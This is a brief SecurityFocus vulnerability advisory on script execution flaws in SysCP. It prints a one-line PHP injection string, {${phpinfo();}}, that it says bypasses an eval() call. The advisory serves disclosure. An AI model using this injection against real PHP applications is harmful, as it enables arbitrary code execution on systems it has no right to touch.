SysCP Multiple Script Execution Vulnerabilities

An exploit is not required.

The following string is sufficient to bypass the eval() call:
{${phpinfo();}}


 

Privacy Statement
Copyright 2010, SecurityFocus